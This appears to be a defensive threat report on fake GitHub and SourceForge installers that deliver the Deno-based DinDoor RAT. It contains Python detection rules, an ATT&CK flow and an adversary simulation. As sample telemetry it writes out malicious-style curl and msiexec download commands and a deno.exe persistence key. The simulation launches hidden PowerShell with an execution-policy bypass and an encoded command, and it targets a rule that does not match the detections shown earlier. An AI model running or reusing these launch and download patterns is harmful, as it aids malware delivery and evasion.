SOC Prime Bias: Critical

27 May 2026 15:32 UTC

Fake software on GitHub and SourceForge distribute Deno RAT by Gabriele Orini

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors are distributing fake installers and plug-ins for widely used software through GitHub and SourceForge to deliver a Deno-based backdoor known as DinDoor. The malware installs the Deno runtime through Scoop or WinGet, then launches a JavaScript RAT capable of stealing data, executing remote commands, and enabling peer-to-peer video streaming. Malicious MSI packages and PowerShell scripts are used to start the infection chain, while command-and-control traffic is carried over HTTP or WebSocket. The campaign also abuses compromised YouTube channels to drive victims toward the malicious repositories.

Investigation

Researchers reconstructed the full infection sequence, beginning with curl commands that downloaded an MSI file, followed by installer scripts that deployed Scoop, WinGet, and Deno before executing the DinDoor JavaScript loader. Their analysis documented the RAT’s capabilities, including system reconnaissance, browser and crypto wallet theft, VNC over WebSocket, and Edge-based peer-to-peer streaming. The team also extracted indicators such as domains, URLs, IP addresses, and command-line artifacts to support detection and threat hunting.

Mitigation

Organizations should download software only from official vendor websites and verify digital signatures before running any installer. Security teams should monitor for unusual use of Scoop and WinGet to install Deno, as well as unexpected MSI-based software deployment. Outbound traffic to the identified malicious domains and IP addresses should be blocked, and PowerShell or curl activity that downloads and runs files from untrusted sources should be closely inspected.

Response

Defenders should alert on msiexec launching files sourced from suspicious GitHub or SourceForge URLs, on Run registry keys that start deno.exe, and on network communication with the known command-and-control infrastructure. Affected hosts should undergo forensic review to locate dropped scripts, the Deno runtime, and any persistence mechanisms. Compromised systems should be isolated immediately, and all unauthorized Deno installations should be removed.
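The detection points listed under Mitigation and Response, expressed as simple rules run over a constructed stream of process-creation and registry events. This is an added example, not SOC Prime's rule content or code from the report; the field names, file paths, URLs and the `Updater` Run value are assumed placeholders.

```python
import re

# Constructed sample telemetry (not from the report): normalised endpoint events.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c curl -s -o %TEMP%\setup.msi https://sourceforge.net/projects/fake-tool/files/setup.msi/download"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://github.com/example-org/fake-plugin/releases/download/v1/setup.msi /qn"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command scoop install deno"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c winget install --id DenoLand.Deno --silent"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\u\scoop\apps\deno\current\deno.exe run -A C:\Users\u\AppData\Local\x.js"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Temp\vendor-signed.msi /qn"},  # benign: local package, no repo URL
]

# Code-hosting origins named in the report (githubusercontent.com is GitHub's raw/release download host).
REPO_URL = re.compile(r"https?://(?:[\w.-]+\.)?(?:github\.com|githubusercontent\.com|sourceforge\.net)/", re.I)

# Each rule: (name, event type it applies to, predicate over the event).
RULES = [
    ("msiexec_from_repo_url", "process",
     lambda e: e["image"].lower().endswith("msiexec.exe") and REPO_URL.search(e["cmdline"]) is not None),
    ("curl_downloads_msi", "process",
     lambda e: re.search(r"\bcurl(?:\.exe)?\b.*https?://\S+\.msi\b", e["cmdline"], re.I) is not None),
    ("deno_installed_via_scoop_or_winget", "process",
     lambda e: re.search(r"\b(?:scoop|winget)(?:\.exe)?\b.*\binstall\b.*\bdeno\b", e["cmdline"], re.I) is not None),
    ("run_key_launches_deno", "registry",
     lambda e: r"\currentversion\run" in e["key"].lower() and "deno.exe" in e["value"].lower()),
]

def evaluate(event: dict) -> list[str]:
    """Return the names of every rule that fires on a single event."""
    return [name for name, etype, pred in RULES if event["type"] == etype and pred(event)]

def detect(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run all rules over an event stream; return (index, matched rule names) for hits only."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]

if __name__ == "__main__":
    for i, names in detect(EVENTS):
        print(f"event {i}: {', '.join(names)}")
```

The last event (a locally sourced MSI) produces no hit, which is the tuning point: the msiexec rule keys on the download origin, not on msiexec itself.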

Attack Flow

    graph TB
        %% Class definitions
        classDef technique fill:#99ccff
        classDef tool fill:#ffcc99
        classDef operator fill:#ff9900

        %% Attack steps as technique nodes
        step1_malicious_link["<b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks a malicious YouTube link that redirects to a counterfeit GitHub or SourceForge project"]
        class step1_malicious_link technique
        step1_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/>Compromised YouTube channels inject malicious URLs into video descriptions or comments"]
        class step1_content_injection technique
        step2_msiexec["<b>Technique</b> – <b>T1218.007 System Binary Proxy Execution: Msiexec</b><br/>Command downloads an MSI file and executes it via msiexec"]
        class step2_msiexec technique
        step3_installer_pkg["<b>Technique</b> – <b>T1546.016 Event Triggered Execution: Installer Packages</b><br/>PowerShell script uses Scoop or WinGet to install the Deno runtime"]
        class step3_installer_pkg technique
        step4_logon_script["<b>Technique</b> – <b>T1037.001 Boot or Logon Initialization Scripts: Logon Script</b><br/>Creates a Run registry key that launches the Deno backdoor at logon"]
        class step4_logon_script technique
        step5_reflective_load["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/>Backdoor runs an eval-loop that fetches and executes JavaScript code entirely in memory"]
        class step5_reflective_load technique
        step6_c2["<b>Technique</b> – <b>T1102 Web Service</b> and <b>T1102.002 Bidirectional Communication</b><br/>Uses HTTP endpoints and a custom WebSocket VNC channel for command and control"]
        class step6_c2 technique
        step7_browser_creds["<b>Technique</b> – <b>T1555.003 Credentials from Password Stores: Web Browsers</b><br/>Stealer extracts saved browser passwords"]
        class step7_browser_creds technique
        step7_input_capture["<b>Technique</b> – <b>T1056 Input Capture</b><br/>Keylogging and form capture to obtain credentials"]
        class step7_input_capture technique
        step7_clipboard["<b>Technique</b> – <b>T1115 Clipboard Data</b><br/>Collects clipboard contents that may contain sensitive data"]
        class step7_clipboard technique
        step8_browser_discovery["<b>Technique</b> – <b>T1217 Browser Information Discovery</b><br/>Gathers cryptocurrency wallet files, browser data and screenshots"]
        class step8_browser_discovery technique
        step9_exfil["<b>Technique</b> – <b>T1011 Exfiltration Over Other Network Medium</b><br/>Transmits collected data through the same HTTP/WebSocket channels"]
        class step9_exfil technique
        step10_process_injection["<b>Technique</b> – <b>T1055.005 Process Injection: Thread Local Storage</b><br/>Injects malicious code into legitimate processes using TLS"]
        class step10_process_injection technique
        step11_indirect_exec["<b>Technique</b> – <b>T1202 Indirect Command Execution</b><br/>Leverages msiexec to proxy execution of additional payloads"]
        class step11_indirect_exec technique

        %% Optional tool nodes
        tool_msiexec["<b>Tool</b> – <b>Name</b>: msiexec<br/><b>Description</b>: Windows Installer executable used for proxy execution"]
        class tool_msiexec tool
        tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Scripting environment used to drive installer packages"]
        class tool_powershell tool
        tool_deno["<b>Tool</b> – <b>Name</b>: Deno<br/><b>Description</b>: Runtime that hosts the JavaScript backdoor"]
        class tool_deno tool

        %% Connections showing the attack flow
        step1_malicious_link -->|leads to| step2_msiexec
        step1_content_injection -->|supports| step2_msiexec
        step2_msiexec -->|uses| tool_msiexec
        step2_msiexec -->|triggers| step3_installer_pkg
        step3_installer_pkg -->|uses| tool_powershell
        step3_installer_pkg -->|installs| tool_deno
        step3_installer_pkg -->|enables| step4_logon_script
        step4_logon_script -->|establishes| step5_reflective_load
        step5_reflective_load -->|provides| step6_c2
        step6_c2 -->|facilitates| step7_browser_creds
        step6_c2 -->|facilitates| step7_input_capture
        step6_c2 -->|facilitates| step7_clipboard
        step7_browser_creds -->|feeds into| step8_browser_discovery
        step7_input_capture -->|feeds into| step8_browser_discovery
        step7_clipboard -->|feeds into| step8_browser_discovery
        step8_browser_discovery -->|sent via| step9_exfil
        step9_exfil -->|uses channel from| step6_c2
        step5_reflective_load -->|enables| step10_process_injection
        step10_process_injection -->|escalates privileges for| step11_indirect_exec
        step11_indirect_exec -->|executes| step2_msiexec

        class step1_malicious_link,step1_content_injection,step2_msiexec,step3_installer_pkg,step4_logon_script,step5_reflective_load,step6_c2,step7_browser_creds,step7_input_capture,step7_clipboard,step8_browser_discovery,step9_exfil,step10_process_injection,step11_indirect_exec technique
        class tool_msiexec,tool_powershell,tool_deno tool

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker has gained an initial foothold via a malicious CMD script delivered in a phishing attachment. To maintain stealth, the script launches PowerShell with a hidden window, bypasses the execution policy, and runs a base64-encoded payload that downloads and runs a second-stage payload. The resulting command line contains all three substrings the rule flags (hidden window, execution-policy bypass, encoded command), so the simulation generates exactly the telemetry the detection logic expects.

    1. Stage 1 – CMD launcher (simulated by the tester):

       @echo off
       rem %payload% must hold the base64 string produced in Stage 2; the value below is a placeholder
       set "payload=PASTE_STAGE2_BASE64_HERE"
       start "" powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand %payload%
    2. Stage 2 – PowerShell payload (base64‑encoded, benign for test):

       $cmd = 'Write-Output "Malicious simulation executed"'
       $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
       $b64 = [Convert]::ToBase64String($bytes)
       echo $b64   # Insert this value as %payload% in the batch file
  • Regression Test Script: The script below automates the entire flow, generating the encoded command, launching PowerShell with the required flags, and then pausing briefly to let the SIEM ingest the event.

    # -------------------------------------------------
    # Regression Test – PowerShell Hidden + Bypass EP
    # -------------------------------------------------
    # 1) Build a harmless payload (Write‑Output)
    $payload = 'Write-Output "Malicious simulation executed"'
    
    # 2) Encode payload in base64 (Unicode encoding, as PowerShell expects)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
    $b64   = [Convert]::ToBase64String($bytes)
    
    # 3) Launch PowerShell with the exact flag set required by the Sigma rule
    $psCmd = @(
        'powershell.exe',
        '-NoProfile',
        '-ExecutionPolicy', 'Bypass',
        '-WindowStyle', 'Hidden',
        '-EncodedCommand', $b64
    ) -join ' '
    
    Write-Host "Executing:`n$psCmd"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile","-ExecutionPolicy","Bypass","-WindowStyle","Hidden","-EncodedCommand",$b64 -WindowStyle Hidden
    
    # 4) Wait for logging to propagate (adjust as needed)
    Start-Sleep -Seconds 10
    Write-Host "Simulation complete – check SIEM for detection."
  • Cleanup Commands: Remove any temporary files (none created here) and ensure no lingering PowerShell processes remain.

    # Stop only the hidden PowerShell instance(s) this session spawned for the test: match on parent PID
    # and the -EncodedCommand flag, rather than terminating every powershell.exe on a possibly shared host
    Get-CimInstance Win32_Process -Filter "Name='powershell.exe'" |
        Where-Object { $_.ParentProcessId -eq $PID -and $_.CommandLine -like '*-EncodedCommand*' } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }
    Write-Host "Cleanup complete."